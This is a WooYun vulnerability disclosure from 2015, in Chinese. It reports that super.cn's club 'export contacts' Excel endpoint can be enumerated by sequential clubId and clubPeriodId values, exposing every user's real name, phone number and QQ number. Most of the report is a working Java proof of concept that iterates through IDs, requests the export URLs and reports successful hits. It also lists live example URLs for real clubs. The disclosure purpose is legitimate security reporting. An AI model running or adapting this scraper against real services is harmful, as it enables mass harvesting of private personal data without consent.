当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138205

漏洞标题:超级课程表某主营业务逻辑缺陷导致全体用户真实姓名手机和QQ隐私泄露

相关厂商:super.cn

漏洞作者: dragonwing

提交时间:2015-08-31 17:39

修复时间:2015-09-05 17:40

公开时间:2015-09-05 17:40

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-31: 细节已通知厂商并且等待厂商处理中
2015-09-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

超级课程表某主营业务,泄露全体用户真实姓名和手机和QQ等隐私信息。

详细说明:

超级社团是超级课程表主营业务,截止至目前已有4万多个社团加入。


主要功能之一就是:方便用户寻找社团内其他用户的联系方式,包括QQ和手机号码和短号,其中还包括用户的院系和社团名称和社团职位等信息,这些信息对于社团内部成员来说是公开的,但对于社团外的人来说,这便是隐私。
进入超级社团后有一个大大的按钮——“导出通讯录”
链接格式如下:

http://club.super.cn/Excel/exportClubContacts.xls?clubId=&clubPeriodId=


经简单研究发现clubId为社团id,clubPeriodId为社团周期id。
当一个社团被新建时,clubId自增,clubPeriodId也自增。
当一个社团被删除时,clubId自减,clubPeriodId不变。
更多详细规则,就不在此阐述,直接上POC,以下是获取获取正确的clubId和clubPeriodId对应关系的代码(已避免盲目暴力破解):

import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.InputStreamReader;
import java.io.OutputStreamWriter;
import java.net.CookieManager;
import java.net.HttpURLConnection;
import java.net.URL;
import java.util.ArrayList;
import java.util.List;
import java.util.Scanner;
public class SuperClubTryClubPeriodId {
CookieManager ca = new CookieManager();
String sessionID = "";
int ClubPeriodId;
int ClubId;
int num;
int tempClubId;
int tempClubPeriodId;
int tempNum;
int tempWhetherRecord;

public int getClubPeriodId() {
return ClubPeriodId;
}
public void setClubPeriodId(int ClubPeriodId) {
this.ClubPeriodId = ClubPeriodId;
}

public int getNum() {
return num;
}
public void setNum(int num) {
this.num = num;
}
public int getClubId() {
return ClubId;
}
public void setClubId(int ClubId) {
this.ClubId = ClubId;
}
public int gettempClubPeriodId() {
return tempClubPeriodId;
}
public void settempClubPeriodId(int tempClubPeriodId) {
this.tempClubPeriodId = tempClubPeriodId;
}






public static void main(String args[]){
SuperClubTryClubPeriodId SCtryCP= new SuperClubTryClubPeriodId();
SCtryCP.setNum(29);
SCtryCP.setClubPeriodId(650);
SCtryCP.settempClubPeriodId(SCtryCP.getClubPeriodId());
Object[] ClubIdtemp=getClubIdTxt();
for (; SCtryCP.getNum() < ClubIdtemp.length; ) {
SCtryCP.setClubId(chooseClubId(SCtryCP.getNum()));
SCtryCP.crack(SCtryCP.getClubId(), SCtryCP.getClubPeriodId());
}

}

public void crack(int ClubId,int ClubPeriodId){
SuperClubTryClubPeriodId SCtryCP= new SuperClubTryClubPeriodId();
int count = 0;

if (this.ClubPeriodId-this.tempClubPeriodId<100) {
if (this.tempWhetherRecord==0){
this.tempNum=this.num;
this.tempClubPeriodId=this.ClubPeriodId;
this.tempWhetherRecord=1;
}

String url="http://Club.super.cn/Excel/exportClubContacts.xls?clubId="+ClubId+"&clubPeriodId="+ClubPeriodId;

if (judgeExists(url)==true){
String EXCEL="";
EXCEL=SCtryCP.get(url, "utf-8");
String key="Arial1";
int index = 0;
while((index=EXCEL.indexOf(key,index))!=-1){
index = index+key.length();
count++;
}
if (count==4) {
System.out.println("成功:ClubId:"+ClubId+","+"ClubPeriodId:"+ClubPeriodId);
this.num++;
this.tempWhetherRecord=0;
} else if (count==5){
}
this.ClubPeriodId++;

} else {
System.out.println("此ClubId:"+ClubId+"不存在通讯录数据");
this.num++;
}

} else {
System.out.println("此ClubId:"+ClubId+"无规律需要暴力破解");
this.tempNum=this.tempNum+1;
this.num=this.tempNum;
this.tempClubPeriodId=this.tempClubPeriodId-50;
this.ClubPeriodId=this.tempClubPeriodId;
}
}




public static int chooseClubId(int j){
Object[] ClubIdtemp=getClubIdTxt();
int ClubIdNum = 0;

try{
ClubIdNum=Integer.parseInt((String) ClubIdtemp[j]);
}
catch (NumberFormatException e){
}
return ClubIdNum;
}

public static Object[] getClubIdTxt(){

Scanner sc = null;
Object[] temp = null;
try {
sc = new Scanner(new File("F:/超级ClubId.txt"));
String str = null;
List<String> list = new ArrayList<String>();
while (sc.hasNextLine()) {
str = sc.nextLine();
list.add(str);
}

temp = list.toArray();

}

catch (FileNotFoundException e) {
}
finally {
if(sc !=null)sc.close();
}
return temp;
}


static boolean judgeExists(String URLName) {
try {
HttpURLConnection.setFollowRedirects(false);
HttpURLConnection con = (HttpURLConnection) new URL(URLName).openConnection();
con.setRequestMethod("GET");
return (con.getResponseCode() == HttpURLConnection.HTTP_OK);
} catch (Exception e) {
e.printStackTrace();
return false;
}
}


public String get(String url, String charset) {
try {
String key = "";
String cookieVal = "";
URL httpURL = new URL(url);
HttpURLConnection http = (HttpURLConnection) httpURL
.openConnection();
if (!sessionID.equals("")) {
http.setRequestProperty("Cookie", sessionID);
}
for (int i = 1; (key = http.getHeaderFieldKey(i)) != null; i++) {
if (key.equalsIgnoreCase("set-cookie")) {
cookieVal = http.getHeaderField(i);
cookieVal = cookieVal.substring(
0,
cookieVal.indexOf(";") > -1 ? cookieVal
.indexOf(";") : cookieVal.length() - 1);
sessionID = sessionID + cookieVal + ";";
}
}
BufferedReader br = new BufferedReader(new InputStreamReader(
http.getInputStream(), charset));
StringBuilder sb = new StringBuilder();
String temp = null;
while ((temp = br.readLine()) != null) {
sb.append(temp);
sb.append("\n");
}
br.close();
return sb.toString();
} catch (Exception e) {
e.printStackTrace();
}
return null;
}


漏洞证明:

http://club.super.cn/Excel/exportClubContacts.xls?clubId=28027&clubPeriodId=29029

QQ截图20150831160701.jpg


http://club.super.cn/Excel/exportClubContacts.xls?clubId=23784&clubPeriodId=24699

QQ截图20150831161346.jpg

修复方案:

从clubId处就应该开始加密,防止暴力破解

版权声明:转载请注明来源 dragonwing@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-05 17:40

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论